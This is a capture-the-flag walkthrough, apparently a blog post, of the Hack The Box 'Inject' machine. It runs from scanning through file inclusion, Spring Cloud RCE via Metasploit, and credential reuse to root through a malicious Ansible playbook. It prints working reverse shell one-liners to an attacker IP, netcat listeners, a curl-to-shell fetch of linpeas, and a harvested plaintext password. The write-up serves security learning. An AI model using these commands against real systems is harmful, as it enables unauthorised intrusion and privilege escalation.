Just tackled the ‘Inject’ machine on #HackTheBox. Loved the exploration of high ports and the challenge of the injection exploitation! If you’re into #CTF, this is a must try! đ #CyberSecurity #PenTesting #EthicalHacking #InfoSec
The first step we will do is perform our Nmap scan:
ââ$ sudo nmap -sT -n -Pn -sV -T4 -vv 10.10.11.204
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp open nagios-nsca syn-ack Nagios NSCA
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see some interesting information. We have found the port â8080â with the service âNagios NSCAâ. In this point we can try to search more information about this service. Letâs check with our navigator this application:
We can see is a kind of application to give us a storage service. However, we can see more information in this application:
In the blog section, we can see two possible user âadminâ and âBrandon Augerâ. Letâs see more parts of the application:
We have found âUpload filesâ function, might be it is a way to exploit some reverse shell. Also, we can found another function in this site about âSign Upâ button:
We can try to enumerate more directories with âffufâ:
sudo ffuf -w /usr/share/dirb/wordlists/common.txt -u <http://10.10.11.204:8080/FUZZ> -v
[Status: 200, Size: 5371, Words: 1861, Lines: 113, Duration: 90ms]
| URL | <http://10.10.11.204:8080/blogs>
* FUZZ: blogs
[Status: 500, Size: 106, Words: 3, Lines: 1, Duration: 432ms]
| URL | <http://10.10.11.204:8080/error>
* FUZZ: error
[Status: 500, Size: 712, Words: 27, Lines: 1, Duration: 481ms]
| URL | <http://10.10.11.204:8080/environment>
* FUZZ: environment
[Status: 200, Size: 5654, Words: 1053, Lines: 104, Duration: 193ms]
| URL | <http://10.10.11.204:8080/register>
* FUZZ: register
[Status: 200, Size: 1857, Words: 513, Lines: 54, Duration: 33ms]
| URL | <http://10.10.11.204:8080/upload>
* FUZZ: upload
Apparently, we donât found more directories. We will try to upload some file through the functionality discovered and then capture the request with our burp suite:
Letâs try to upload a âjpegâ file. We will see our request in burp suite:
Before upload the âjpegâ file I have tried some files but it didnât works. After forward our request we will see the response and finally discover something interesting:
We have found the function that the application use to show us our uploaded files:
Now, we will try to upload some reverse shell and modify through burp suite our request to bypass the restrictions. First, we will need to turn on our listen server with netcat:
sudo nc -nlvp 4444
Now, we will create a new file with this content:
sh -i >& /dev/tcp/10.10.16.38/4444 0>&1
Now, we will try to upload this file but we will need to modify our request with burp suite (extension of the file):
But apparently is not working:
If we analyzing the url we can see that probable we can exploit it with file inclusion:
We can see the application is vulnerable to file inclusion. Letâs see if we can check â/etc/passwdâ file:
We have discovered the users âfrankâ and âphilâ. We need to enumerate more, letâs see what we can found. If we still searching through the different directories we will see the file âpom.xmlâ:
This file give us a lot of information but we can see something interesting and is the technology thatâs using âorg.springframework.cloudâ. After receive this information we can search if exists some exploit for this technology:
ââ$ searchsploit spring cloud
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Spring Cloud Config 2.1.x - Path Traversal (Metasploit) | java/webapps/46772.rb
Spring Cloud Config 2.1.x - Path Traversal (Metasploit) | java/webapps/46772.rb
Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE) | java/webapps/50799.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
However, if we search in metasploit the function that already we have found we will see this exploit:
After configure this exploit, we will can exploit the vulnerability:
We will check some information into our meterpreter session:
meterpreter > sysinfo
Computer : 10.10.11.204
OS : Ubuntu 20.04 (Linux 5.4.0-144-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: frank
No we have access to this machine through the user âfrankâ. Letâs see if we can execute one shell to search more information in this machine:
meterpreter > shell
Process 8848 created.
Channel 1 created.
Now, we already have one shell. In this point we need to enumerate more to try to gain access to the next user because now we donât have access to reach it. We will found the next file with the âphilâ credentials:
pwd
/home/frank/.m2
ls -la
total 12
drwx------ 2 frank frank 4096 Feb 1 18:38 .
drwxr-xr-x 5 frank frank 4096 Feb 1 18:38 ..
-rw-r----- 1 root frank 617 Jan 31 16:55 settings.xml
cat settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="<http://maven.apache.org/POM/4.0.0>" xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>"
xsi:schemaLocation="<http://maven.apache.org/POM/4.0.0> <https://maven.apache.org/xsd/maven-4.0.0.xsd>">
<servers>
<server>
<id>Inject</id>
<username>phil</username>
<password>DocPhillovestoInject123</password>
<privateKey>${user.home}/.ssh/id_dsa</privateKey>
<filePermissions>660</filePermissions>
<directoryPermissions>660</directoryPermissions>
<configuration></configuration>
</server>
</servers>
</settings>
Now, with the new information we can to check if we can approach this function to gain access with the user âphilâ:
su phil
Password: DocPhillovestoInject123
We will check our user:
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
Go to the user home:
cd /home/phil/
Check the directory:
ls -la
total 24
drwxr-xr-x 3 phil phil 4096 Feb 1 18:38 .
drwxr-xr-x 4 root root 4096 Feb 1 18:38 ..
lrwxrwxrwx 1 root root 9 Feb 1 07:40 .bash_history -> /dev/null
-rw-r--r-- 1 phil phil 3771 Feb 25 2020 .bashrc
drwx------ 2 phil phil 4096 Feb 1 18:38 .cache
-rw-r--r-- 1 phil phil 807 Feb 25 2020 .profile
-rw-r----- 1 root phil 33 Jun 7 04:47 user.txt
Finally, we can check the user flag:
cat user.txt
Now, in this point, we will improve our shell with python:
python3 -c 'import pty; pty.spawn("/bin/bash")'
We need to enumerate more to try to gain root access. We will to turn on our web server to donwload linpeas in the machine:
sudo python3 -m http.server 80
After that, we will execute linpeas in the machine:
curl <http://10.10.16.38/linpeas.sh> | sh
We have discovered â/tmp/Vodoyâ binary process with non âroot rootâ and not belonging to current user:
Letâs enumerate more information about that with the tool âpspy64â:
phil@inject:~$ wget <http://10.10.16.38/pspy64>
phil@inject:~$ chmod +x pspy64
phil@inject:~$ ./pspy64
We will found a lot of ansible processes and automation tasks. Letâs see if we can execute PE through ansible:
Letâs try to do PE with ansible task (https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/). We need to go to the directory â/opt/automation/tasks/â because we will create new task. Now, we need to prepare our evil task. Create new file with this content:
- hosts: localhost
tasks:
- name: RShell
command: sudo bash /tmp/root.sh
Now, we can download it through our machine:
phil@inject:/opt/automation/tasks$ wget <http://10.10.16.38:8080/evil.yml>
The next step is create the file â/tmp/root.shâ with reverse shell:
echo '/bin/bash -i >& /dev/tcp/10.10.16.38/4422 0>&1' > /tmp/root.sh
Also donât forget to turn on our netcat server:
ââ$ sudo nc -nlvp 4422
Now, we can exploit the vulnerability to gain root access in the machine:
phil@inject:/opt/automation/tasks$ ansible-playbook evil.yml
Now, we will receive the reverse shell with root permissions:
Now we can reach the root flag:
root@inject:/opt/automation/tasks# cd /root/
cd /root/
root@inject:~# ls
playbook_1.yml
root.txt
root@inject:~# cat root.txt
cat root.txt
That’s it for our deep-dive into ‘Inject,’ a true masterclass in understanding and exploiting vulnerabilities in the world of Hack The Box CTF challenges. As we unpacked the twists and turns of enumeration and injection, we’ve gained vital knowledge and new skills, elevating our cybersecurity expertise. Until the next challenge, keep on hacking, keep on learning, and always explore responsibly. Stay tuned for more journeys into the thrilling world of CTF challenges!»
Keep your hacking spirit high and cybersecurity curiosity alive!